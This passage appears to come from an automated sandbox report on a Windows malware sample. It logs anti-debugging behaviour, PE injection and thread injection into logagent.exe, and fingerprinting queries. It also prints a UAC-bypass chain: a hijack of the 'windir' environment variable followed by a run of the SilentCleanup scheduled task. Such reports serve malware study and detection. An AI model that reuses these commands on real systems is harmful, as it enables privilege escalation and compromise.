Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_104190D7 new,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,17_2_104190D7
Source: C:\Windows\SysWOW64\logagent.exe | Thread delayed: delay time: 922337203685477
Source: logagent.exe, 00000011.00000002.691567421.0000000002B87000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Hides threads from debuggers
Source: C:\Windows\SysWOW64\logagent.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\logagent.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\logagent.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\logagent.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\logagent.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_106A4A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_106A4A7C
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_107F2730 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,17_2_107F2730
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1041F6F5 __EH_prolog,GetProcessHeap,17_2_1041F6F5
Source: C:\Windows\SysWOW64\logagent.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_106B482C mov eax, dword ptr fs:[00000030h] 17_2_106B482C
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034D8164 LdrInitializeThunk,0_3_034D8164
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1069A7EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_1069A7EA
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_106A4A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_106A4A7C

          HIPS / PFW / Operating System Protection Evasion:

          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 5B0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 840000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 850000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 860000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 870000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 5C0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 5D0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 5E0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 800000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 810000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 820000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 830000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 28D0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 28E0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 28F0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 2900000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 10410000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 2910000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 2920000
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Memory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5A
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 5B0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 830000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2900000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2920000
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\logagent.exe logagent.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: logagent.exe, 00000011.00000003.665021305.000000000509D000.00000004.00000001.sdmp | Binary or memory string: Program Manager;
          Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1041EA72 cpuid
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1042369B __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64

          Stealing of Sensitive Information: